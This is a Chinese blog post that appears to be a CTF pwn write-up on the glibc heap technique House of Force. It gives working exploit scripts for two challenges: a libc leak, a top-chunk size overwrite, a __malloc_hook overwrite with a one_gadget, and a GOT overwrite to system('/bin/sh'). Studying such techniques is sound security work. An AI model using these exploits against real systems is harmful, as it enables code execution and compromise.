topchunk利用 | House Of Force

最新推荐文章于 2024-11-03 12:02:27 发布
最新推荐文章于 2024-11-03 12:02:27 发布
阅读量1k 收藏 18
点赞数 10
分类专栏: Pwn 文章标签: linux c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/140389373
版权

House系列的学习。
通过House Of Force对平时见的很少的top chunk有了更深刻的理解。

优秀的学习文章

关于house of force的学习总结 | ZIKH26

House Of Force利用

libc-2.23和libc-2.27
我的理解,
通过top chunk的分割去"逼近"到target_addr。
House Of Force的利用确实不大难,学习后能对堆的布局有更深刻的认识。主要是这个利用条件太苛刻了。
1.能改top chunk的size位为-1(绕过remainder最大块检测)
2.能得到topchunk的地址(计算request_size)
3.malloc的size不受限制(一般很大)

request_size = target_addr - 0x20 - topchunk_addr

例题

gyctf_2020_force

题目

学习到的点:
1.申请超大chunk使得mmap分配,vmmap查看发现分配到了libc里面,所以能得到与libc的偏移,从而泄露libc。
2.HOF本质是对topchunk布局,利用申请的第一个chunk都是topchunk_addr-first_malloc_size处的地方来实现任意地址写。
3.又熟悉了调试方法,学会了vmmap查看整体内存的分配情况。
4.realloc调整下栈帧,根本没必要下断点进calloc看,直接爆破几个即可,+2,+4,+6…

Exp: (远程的,本地的realloc没调对。。)

leak = add(0x200000,b'a')

# offset = 0x200FF0
libcbase = leak + 0x200FF0
info_addr("libcbase",libcbase)

ogs = [0x45216,0x4526a,0xf02a4,0xf1147]
og = libcbase + ogs[1]
info_addr("one_gadget",og)
malloc = libcbase + libc.sym['__malloc_hook']
realloc = libcbase + libc.sym['realloc']

# house of force
pl = p64(0)*3 + p64(0xffffffffffffffff)
leak = add(0x10,pl)
topchunk = leak + 0x10
info_addr("topchunk",topchunk)

# request_size = target_addr - 0x20 - victim
request_size = malloc - 0x20 - topchunk - 0x10
info_addr("size!!!",request_size)
add(request_size,b'aaaa')
addr = add(0x20,b'a'*8+p64(og)+p64(realloc+12))
#addr = add(0x20,b'a'*16+p64(og))

info_addr("realloc_hook",malloc-0x8)
info_addr("addr",addr)

p.sendlineafter('2:puts\n',str(1))
p.sendlineafter('size\n',str(0xFF))

p.interactive()

image

bcloud_bctf_2016

题目

32位的堆,活久见。
emmm,漏洞点真不好找。
在输入name这里:
image

strcpy!!!会多拷贝一个b'\x00'空字节

这里调试看,
strcpy之前的堆布局
image

我们填满0x40,strcpy后的堆布局
image

可以看到一个off-by-null修改了topchunk的size
而且由于紧接着打印的是堆中的内容,而根据堆的布局可以看到填满后是能接着泄露0x08f9f008的,也就是topchunk的prev_size段。(printf遇空字节终止)
image

同样的,后面输入Organization和Host的时候也存在溢出。
我们还是都填满0x40来看堆布局
image

都是因为strcpy时,栈中没有b'\x00'来截断,导致溢出。

所以我们现在:

  1. 可以控制topchunk的size
  2. 知道topchunl的地址
  3. malloc大小无限制
    所以考虑 House Of Force,将p_content的内存空间申请出来。
    漏洞利用思路:
    这样就可以在bss的指针段写入free_got,puts_got这些,然后edit把free_got的值改为puts_plt,然后free(puts_got)泄露libc,再把free_got改为system,最后布置一个/bin/sh即可。

但还是有些细节,比如不能edit(0)(topchunk的size有问题)
然后就是不知道为什么本地打不通,但能打通远程。。。
Exp:

free_got = elf.got['free']
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

sa("name:\n",b'a'*0x40)

ru(b'a'*0x40)
leak = leak_address()
info_addr("leak",leak)
topchunk = leak + 0xd0

sa("Org:\n",b'b'*0x40)
sla("Host:\n",p64(0xffffffff))
info_addr("topchunk",topchunk)

target = 0x804B120 # p_content
add(target-0x10-topchunk,b"0")
add(0x20,p32(0)+p32(free_got)+p32(puts_got)+p32(target+0x10)+b'/bin/sh\x00')
edit(1,p32(puts_plt)) # free_got -> puts_plt
free(2) # puts(puts_got)
leak = leak_address()
info_addr("puts_addr",leak)

libcbase = leak - libc.sym['puts']
info_addr("libcbase",libcbase)
system = libcbase + libc.sym['system']

edit(1,p32(system))
free(3)


p.interactive()

本地:
image

远程:
image

N0zoM1z0
关注
专栏目录
Linux利用House of Force
、moddemod
06-15 535
写在前面的话 其实我也是照葫芦画瓢(但学习本来就是这么一件事),首先基本的原理你的搞懂吧。具体参考CTF-WIKI,那个真的是说得非常清楚了!我也只是记录一下自己的学习笔记! 原理 首先House of Force这种利用方法,主要强调一点就是堆溢出,溢出到能够覆盖top chunk的大小,也即是size域!,这就是最基本的利用条件。 因为当我们每一次malloc(),其实都是在申请一块chunk,在物理结构上,因为我们现在能够申请的chunk的位置是在ptmalloc给我们分配的分配区里面,就在这个这个分
House Of Force
qq_61670993的博客
11-20 118
house of force
利用-house_of_force-top_chunk
qq_43390703的博客
11-14 385
house_of_force House Of Force 是一种堆利用方法,如果一个堆 (heap based) 漏洞想要通过 House Of Force 方法进行利用,需要以下条件: 能够以溢出等方式控制到 top chunk 的 size 域 能够自由地控制堆分配尺寸的大小 产生原因 glibc中如果进行堆块分配的时候,如果所有空闲块都无法满足需求,那么就会从top chunk中分割出相应的大小作为堆块空间。 但是当top chunck分配堆块的size值可以由用户控制的时候,top chu
利用 house of force
m0_64195960的博客
05-25 408
1)堆溢出漏洞 把top chunk的size改成一个很大的值 有一个可以自由写入的chunk,向上写入,将chunk覆盖掉size字段,修改topchunk的大小为0xffffffff(4GB,32位的寻址空间) 此时由于top chunk太大啦不够啦,操作系统就会通过mmap函数,给你分配很多很多空间,给我们写东西。 基本上这里面整个程序都topchunk,或者是个内存都是topchunk,都可以被我们划分 也就是说我们malloc可以得到任意地址的空间 2)攻击思路 .
House of Force
yms0211的博客
09-26 1338
利用house of force
Linux下堆溢出利用2-House of force基本原理
haibiandaxia的博客
08-31 1434
Linux下堆溢出利用 2-House of force基本原理1 前言2 基础知识2.1 Top Chunk的分割机制2.2 溢出top chunk的方法2.3 利用条件3 程序和调试环境准备3.1 实验环境3.2实验目标3.3演示程序3.4编译命令4 程序调试5 总结6 参考链接 1 前言 House of Force 是一种堆利用方法,可以实现任意内存地址的读写,个人认为难理解的点有两个: 如何通过溢出已经分配的chunk,准确覆盖top chunk中的size字段; 我们的目的是将top chun
【PWN】House Of Einherjar&House Of Force
u014377094的博客
05-04 395
ctfwiki上house系列第一个与第二个。利用方法也相对简单,内容也较少,决定一块儿复习了。 House Of Einherjar House Of Einherjar个人理解,通过修改victim堆块的pre_size和pre_inuse,free操作会检查前后已经被释放的堆块,并对都释放了的堆块进行合并操作,如果能够有效伪造堆块fake_chunk,可以让victim块和fake_chunk均伪造为释放状态,最后合并成一个特别大的块,再次申请来某片空间的控制权。 由于extend的操作,其不得
the House of Force技术简单分析
小强的博客
08-09 850
实例代码如下: #include #include #include int main(int argc, char *argv[]) { char *buf1, *buf2, *buf3; if (argc != 4) return; buf1 = malloc(256); strcpy(buf1, argv[1]); buf2 = malloc(strtoul(argv[2]
The malloc maleficarum之The House of Force漏洞
董哥的黑板报
08-11 934
一、漏洞原理 攻击者通过堆溢出或者其他方式,控制到topchunk的size成员,这样我们就可以使topchunk的地址超出正常的堆段的地址,这样我们就可以控制到超出堆段之外的内存 二、漏洞实现 ①通过堆溢出或其他方式,控制到topchunk的size成员 ②将topchunk的size成员变为一个非常大的数,这样topchunk就会超出内存中的堆段,从而访问到其他段的内存地址(got表的地...
pwn工具箱之house of force
jmp esp
07-03 1005
house of force基本信息 利用类型:堆利用利用类型:top chunk相关 利用思想:通过修改top chunk大小,使得分配任意大小都是从top chunk里边切出来,这样分配一个大小占满想要写的位置和当前分配位置top chunk的差,下一个分配就可以分配出想要写的位置 利用难点 需要有办法能够更改到top chunk大小 需要能够知道当前位置和要写位置的差值 需要能够自由控制将
堆漏洞之house系列1
08-04
其次,House of Force利用的是top chunk的size字段篡改来实现任意地址分配。正常情况下,当所有bin中都没有可用chunk时,内存分配会从top chunk切分。攻击者通过堆溢出修改top chunk的size,使其变成一个大值,如32...
House of force —— gyctf_2020_force
PLpa的博客
08-13 933
前言: House of force是属于House of xxx系列的利用方法,House of xxx是2004年《The Malloc Maleficarum-Glibc Malloc Exploitation Techniques》中提出的一系列针对glibc堆分配机制的利用方法。 想要利用House of force,需要以下条件: 1.能够以溢出等方式控制top chunk的size域。 2.能够自由的分配堆的大小 解题思路 保护机制 保护全开,64位。 IDA查看伪代码 程序有两个功能,
BUUCTF-PWN gyctf_2020_forcehouse of force
weixin_44145820的博客
04-15 1429
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
Linux】进程状态相关知识详细梳理
最新发布
fulufulucode的博客
11-03 289
可以看到,子进程退出后,父进程没有进行资源回收(调用wait()),子进程的状态就会变成“Z+”,其中Z表示僵尸状态 ,+表示进程属于前台进程的一部分。每个僵尸进程在进程表中保留一个条目,系统的进程表是有限的。如果僵尸进程数量过多,可能会导致进程表满,新的进程无法创建。fork函数“有两个返回值”,父进程会返回子进程的pid,子进程会返回0,于此同时,子进程会继承父进程的代码以及数据(所有运行在系统里的进程都以task_struct链表的形式存在内核里,也可以称为进程表。那么如果父进程先退出呢?
Linux特种文件系统--tmpfs文件系统
刘元林的博客
10-29 1027
tmpfs类似于RamDisk(只能使用物理内存),使用虚拟内存(简称VM)子系统的页面存储文件。tmpfs完全依赖VM,遵循子系统的整体调度策略。说白了tmpfs跟普通进程差不多,使用的都是某种形式的虚拟内存,至于数据存储在物理内存中还是在交换分区中,全权交由VM子系统。定义: 是一个基于内存的文件系统,它在 RAM 中存储数据,因此访问速度非常快。用途: 通常用于存储临时文件,这些文件不需要永久保存,而且频繁读写。使用 可以减少对物理磁盘的磨损,并提高性能。示例路径:常见的 挂载点包括 、、 等。持
第三章.Linux文件管理和IO重定向
Raymond的博客
10-30 66
Linux的文件系统分层结构:FHS Filesystem Hierarchy Standard参考文档:http://www.pathname.com/fhs/ 1.3 应用程序的组成部分 1.4 CentOS 7 以后版本目录结构变化 /bin 和 /usr/bin /sbin 和 /usr/sbin /lib 和/usr/lib /lib64 和 /usr/lib64 范例: 1.5 Linux下的文件类型 - 普通文件 d 目录文件directory b 块设备block c 字符设备cha
Linux】MySQLMGR主从复制
Stringzhua的博客
10-30 843
MySQL是⽬前最流⾏的开源关系型数据库,国内⾦融⾏业也开始全⾯使⽤,其中MySQL5.7.17提出的 MGR(MySQL Group Replication)既可以很好的保证数据⼀致性⼜可以⾃动切换,具备故障检测功能、 ⽀持多节点写⼊,MGR是⼀项被普遍看好的技术。MGR(MySQL Group Replication)是MVSQL⾃带的⼀个插件,可以灵活部署。
Linux tac命令‌
weixin_37788102的博客
10-30 323
tac命令实际上是cat命令的一个变体,尽管它的功能相对简单,但在某些情况下非常有用。例如,当需要查看文件的最后一行(通常是标题或总结)时,使用tac命令可以避免滚动查看整个文件。此外,tac命令对于处理大型文件或需要快速定位文件末尾内容的情况非常有用‌。‌Linux tac命令‌是一个用于逆序显示文件内容的工具,其名称来源于“cat”的反向拼写。tac命令的基本功能是将文件的内容从最后一行开始输出,直到第一行结束,这与cat命令的功能相反,cat命令是从第一行开始输出直到最后一行。tac命令的基本用法。
Linux 之 信号概念、进程、进程间通信、线程、线程同步
挥剑决浮云的博客
11-01 618
如果释放互斥锁时有一个以上的线程阻塞,那么这些阻塞的线程会被唤醒,它们都会尝试对互斥锁进行加锁,当有一个线程成功对互斥锁上锁之后,其它线程就不能再次上锁了,只能再次陷入阻塞,等待下一次解锁。事实上,子进程是父进程的一个副本,譬如子进程拷贝了父进程的数据段、堆、栈以及继承了父进程打开的文件描述符,父进程与子进程并不共享这些存储空间,这是子进程对父进程相应部分存储空间的完全复制,执行fork()之后,每个进程均可修改各自的栈数据以及堆段中的变量,而并不影响另一个进程。是一族函数,而不是一个单独的函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值